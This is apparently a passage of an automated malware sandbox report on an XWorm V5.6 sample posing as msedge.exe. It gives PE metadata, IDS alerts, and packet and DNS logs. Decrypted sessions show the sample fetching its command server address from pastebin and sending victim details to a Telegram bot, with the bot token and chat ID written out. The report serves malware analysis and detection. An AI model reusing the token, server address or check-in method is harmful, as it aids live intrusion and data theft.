                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000xc.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x20000x97a40x9800732655275a32c9952a61d07286066fc0False0.49267578125data5.704586945016344IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rsrc0xc0000x1fd4c0x1fe005eb416130ef4c1469c341a79af26007eFalse0.435922181372549data6.182646419868073IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc0x2c0000xc0x200aa61d73a2c7a2a4507d7faf8eed902afFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0xc2200x7198PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9990027510316368
                                          RT_ICON0x133b80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.21535253756062936
                                          RT_ICON0x23be00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.3363249881908361
                                          RT_ICON0x27e080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4050829875518672
                                          RT_ICON0x2a3b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5145403377110694
                                          RT_ICON0x2b4580x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7411347517730497
                                          RT_GROUP_ICON0x2b8c00x5adata0.7333333333333333
                                          RT_VERSION0x2b91c0x244data0.4706896551724138
                                          RT_MANIFEST0x2bb600x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                          Imports

                                          DLLImport
                                          mscoree.dll_CorExeMain

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                          2024-08-03T20:11:28.691332+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:38.074505+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497227000192.168.2.6213.219.149.161
                                          2024-08-03T20:11:38.696832+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:52.511794+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497227000192.168.2.6213.219.149.161
                                          2024-08-03T20:11:55.631124+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:12:06.948813+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:43.679696+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:18.800314+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:23.649351+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497227000192.168.2.6213.219.149.161
                                          2024-08-03T20:11:13.677035+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:53.694351+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:23.793667+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:12:03.700019+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:12:13.700722+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:48.683210+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:58.696172+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:12:12.990412+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:38.072914+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:08.809199+0200TCP2853685ETPRO MALWARE Win32/XWorm Checkin via Telegram49721443192.168.2.6149.154.167.220
                                          2024-08-03T20:12:06.950681+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497227000192.168.2.6213.219.149.161
                                          2024-08-03T20:11:25.636313+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:52.509901+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:12:12.991173+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497227000192.168.2.6213.219.149.161
                                          2024-08-03T20:11:23.448430+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound497227000192.168.2.6213.219.149.161
                                          2024-08-03T20:11:33.687117+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:12:08.705779+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6
                                          2024-08-03T20:11:23.647357+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049722213.219.149.161192.168.2.6

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 3, 2024 20:11:06.920258045 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:06.920298100 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:06.920455933 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:06.930641890 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:06.930669069 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:07.397459030 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:07.397730112 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:07.400084972 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:07.400101900 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:07.400515079 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:07.445070982 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:07.484543085 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:07.532494068 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:07.591120005 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:07.591219902 CEST44349720104.20.3.235192.168.2.6
                                          Aug 3, 2024 20:11:07.591334105 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:07.631206036 CEST49720443192.168.2.6104.20.3.235
                                          Aug 3, 2024 20:11:07.874955893 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:07.875068903 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:07.875158072 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:07.875574112 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:07.875623941 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:08.515733004 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:08.515887976 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:08.585150003 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:08.585226059 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:08.585731983 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:08.590853930 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:08.636508942 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:08.809226036 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:08.809312105 CEST44349721149.154.167.220192.168.2.6
                                          Aug 3, 2024 20:11:08.809551001 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:08.831983089 CEST49721443192.168.2.6149.154.167.220
                                          Aug 3, 2024 20:11:08.967080116 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:08.972042084 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:08.972160101 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:09.020905018 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:09.025886059 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:13.677035093 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:13.726344109 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:14.144012928 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:14.148987055 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149000883 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149008989 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149044991 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149116993 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149126053 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:14.149137020 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.800313950 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.851311922 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:18.859127045 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:18.864211082 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864229918 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864242077 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864463091 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864475965 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864506006 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:18.864518881 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.448430061 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:23.453468084 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.647356987 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.649350882 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:23.660665989 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.793667078 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.828157902 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:23.833189011 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833220005 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833233118 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833292961 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833370924 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833388090 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:23.833435059 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:25.636312962 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:25.679449081 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:28.691332102 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.742058992 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:28.751878023 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:28.756839037 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.756870985 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.756901026 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757138968 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757168055 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757194996 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:28.757226944 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.687117100 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.721369028 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:33.726372004 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726387978 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726409912 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726418972 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726428032 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726466894 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726475954 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:33.726484060 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:37.883467913 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:37.889391899 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.072913885 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.074505091 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:38.079310894 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.696831942 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.733496904 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:38.738575935 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738595963 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738621950 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738635063 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738647938 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738785982 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738799095 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:38.738811016 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.679696083 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.717814922 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:43.722867012 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.722928047 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.722955942 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723054886 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723104954 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723149061 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723176003 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:43.723237991 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.683209896 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.726345062 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:48.733797073 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:48.738781929 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738818884 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738840103 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738850117 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738884926 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738907099 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738929987 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:48.738940001 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:52.320488930 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:52.325517893 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:52.509901047 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:52.511794090 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:52.516581059 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.694350958 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.734020948 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:53.739058971 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739073038 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739114046 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739123106 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739141941 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739151001 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739159107 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:53.739170074 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:55.631124020 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:55.679455042 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:58.696171999 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.742053986 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:58.775505066 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:11:58.780500889 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780525923 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780541897 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780558109 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780575037 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780606031 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780626059 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:11:58.780642033 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.700018883 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.741991997 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:03.772721052 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:03.777565956 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777648926 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777658939 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777667999 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777678013 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777697086 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777705908 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:03.777718067 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:06.758347034 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:06.763448954 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:06.948812962 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:06.950680971 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:06.955787897 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.705779076 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.757608891 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:08.780375004 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:08.785461903 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785497904 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785511017 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785522938 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785537958 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785550117 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785569906 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:08.785582066 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:12.743014097 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:12.747878075 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:12.990411997 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:12.991173029 CEST497227000192.168.2.6213.219.149.161
                                          Aug 3, 2024 20:12:12.996046066 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:13.700721979 CEST700049722213.219.149.161192.168.2.6
                                          Aug 3, 2024 20:12:13.741976976 CEST497227000192.168.2.6213.219.149.161

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 3, 2024 20:11:06.907565117 CEST5915053192.168.2.61.1.1.1
                                          Aug 3, 2024 20:11:06.914482117 CEST53591501.1.1.1192.168.2.6
                                          Aug 3, 2024 20:11:07.866734982 CEST5968453192.168.2.61.1.1.1
                                          Aug 3, 2024 20:11:07.874283075 CEST53596841.1.1.1192.168.2.6

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Aug 3, 2024 20:11:06.907565117 CEST192.168.2.61.1.1.10x5774Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                          Aug 3, 2024 20:11:07.866734982 CEST192.168.2.61.1.1.10xef65Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Aug 3, 2024 20:11:06.914482117 CEST1.1.1.1192.168.2.60x5774No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                          Aug 3, 2024 20:11:06.914482117 CEST1.1.1.1192.168.2.60x5774No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                          Aug 3, 2024 20:11:06.914482117 CEST1.1.1.1192.168.2.60x5774No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                          Aug 3, 2024 20:11:07.874283075 CEST1.1.1.1192.168.2.60xef65No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • pastebin.com
                                          • api.telegram.org

                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.649720104.20.3.2354433840C:\Users\user\Desktop\msedge.exe
                                          TimestampBytes transferredDirectionData
                                          2024-08-03 18:11:07 UTC74OUTGET /raw/RPPi3ByL HTTP/1.1
                                          Host: pastebin.com
                                          Connection: Keep-Alive
                                          2024-08-03 18:11:07 UTC397INHTTP/1.1 200 OK
                                          Date: Sat, 03 Aug 2024 18:11:07 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          x-frame-options: DENY
                                          x-content-type-options: nosniff
                                          x-xss-protection: 1;mode=block
                                          cache-control: public, max-age=1801
                                          CF-Cache-Status: HIT
                                          Age: 355
                                          Last-Modified: Sat, 03 Aug 2024 18:05:12 GMT
                                          Server: cloudflare
                                          CF-RAY: 8ad844b4182e7cb1-EWR
                                          2024-08-03 18:11:07 UTC26INData Raw: 31 34 0d 0a 32 31 33 2e 32 31 39 2e 31 34 39 2e 31 36 31 3a 37 30 30 30 0d 0a
                                          Data Ascii: 14213.219.149.161:7000
                                          2024-08-03 18:11:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.649721149.154.167.2204433840C:\Users\user\Desktop\msedge.exe
                                          TimestampBytes transferredDirectionData
                                          2024-08-03 18:11:08 UTC448OUTGET /bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                          Host: api.telegram.org
                                          Connection: Keep-Alive
                                          2024-08-03 18:11:08 UTC388INHTTP/1.1 200 OK
                                          Server: nginx/1.18.0
                                          Date: Sat, 03 Aug 2024 18:11:08 GMT
                                          Content-Type: application/json
                                          Content-Length: 463
                                          Connection: close
                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          2024-08-03 18:11:08 UTC463INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 38 33 32 34 30 38 30 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 6f 74 69 66 79 46 6f 72 53 68 61 64 6f 77 43 72 79 70 74 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4e 6f 74 69 66 79 46 6f 72 53 68 61 64 6f 77 43 72 79 70 74 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 37 39 30 31 38 31 38 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 78 69 6d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 6b 70 6f 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 32 37 30 38 36 36
